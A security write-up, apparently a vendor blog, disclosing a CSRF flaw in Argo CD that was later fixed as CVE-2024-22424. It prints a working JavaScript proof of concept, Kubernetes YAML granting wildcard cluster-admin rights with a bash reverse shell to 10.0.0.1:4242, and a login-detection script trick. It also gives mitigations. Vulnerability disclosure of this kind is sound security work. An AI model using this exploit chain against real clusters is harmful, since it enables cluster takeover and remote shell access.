Argo CD CSRF
Argo CD holds the key to production servers and is a critical component of CI/CD pipelines.
During a recent engagement, we encountered Argo CD. It’s hosted on the same parent domain (“same-site”) as another asset we controlled, so we thought about client side attack vectors.
The vulnerability
It's been publicly known for years that all of Argo CD API is vulnerable to Cross-Site Request Forgery (CSRF). We assume the team haven't made it a priority because of the lack of evidence to support it's a severe vulnerability.
Modern browsers implement the Lax SameSite cookie attribute to prevent CSRF, but it is not foolproof. The samesite attribute is rendered useless if the origin is on the same parent domain as the target.
We spin up a sample environment with Argo CD v2.8.2 to test this. An attacker controls contents of marketing.victim.com (via Stored XSS, for example) and wants to target argocd.internal.victim.com.
The following proof of concept allows the attacker to create a pod with admin privileges on the Kubernetes cluster via Argo CD. This piece of JavaScript is injected on the marketing.victim.com homepage:
var xhr = new XMLHttpRequest();
xhr.open('POST', 'https://argocd.internal.victim.com/api/v1/applications');
xhr.setRequestHeader('Content-Type', 'text/plain')
xhr.withCredentials = true;
xhr.send('{"apiVersion":"argoproj.io/v1alpha1","kind":"Application","metadata":{"name":"test-app1"},"spec":{"destination":{"name":"","namespace":"default","server":"https://kubernetes.default.svc"},"source":{"path":"argotest1","repoURL":"https://github.com/califio/argotest1","targetRevision":"HEAD"},"sources":[],"project":"default","syncPolicy":{"automated":{"prune":false,"selfHeal":false}}}}')
Where repoURL points to a repository with the yaml definition like:
apiVersion: v1
kind: ServiceAccount
metadata:
name: my-sa
---
apiVersion: v1
kind: Pod
metadata:
name: my-pod
spec:
serviceAccountName: my-sa
containers:
- name: ubuntu
image: ubuntu:latest
command: ["bash", "-c", "bash -i >& /dev/tcp/10.0.0.1/4242 0>&1"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: my-role
rules:
- apiGroups: [""]
resources: ["*"]
verbs: ["*"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: my-rolebinding
subjects:
- kind: ServiceAccount
name: my-sa
namespace: default
roleRef:
kind: ClusterRole
name: my-role
apiGroup: rbac.authorization.k8s.io
Then wait. An employee logged-in to argocd.internal.victim.com, when visiting marketing.victim.com, will lead to Kubernetes cluster compromise.
This is made possible because:
Argo CD does not respect the Content-Type header. If it did, the request would have triggered a preflight CORS request on "application/json" CT and the attack fails.
The attacker needs zero knowledge to craft a valid json. The cluster location, project name… are available by default.
What’s more, we can make the exploit targeted. From marketing.victim.com, there’s a neat little trick to check whether the current browsing user is logged-in to the target Argo CD or not (idea courtesy of a friend of Calif):
<script src="https://argocd.internal.victim.com/api/v1/projects" onload="alert('Logged in to argocd')" onerror="alert('NOT logged in')"></script>
This is because the API returns 200 on logged-in requests and 403 otherwise.
In reality, we waited until our client announced something on their marketing website. This lured a large number of employees to read the news and we immediately got a shell.
Suggestion
We reported this to Argo CD in September 2023, but have not received a response. Short of a patch, we propose the following mitigations:
Migrate Argo CD off parent domains that do not share the same trust level
Shorten the default session time of 24 hours to 30 minutes or less
Update
The Argo CD team has been responsive since the publishing of this blog post and pushed an update several days later. This issue is now CVE-2024-22424 and fixed on versions 2.9.4, 2.8.8, and 2.7.16.
The initial fix was to add gorilla-csrf to Argo CD. I felt like this was not the right way to address it and recommended them to enforce the application/json content-type header. That was their final fix.
We extend our thanks to the Argo CD maintainers for their receptiveness to feedback and the smooth remediation process.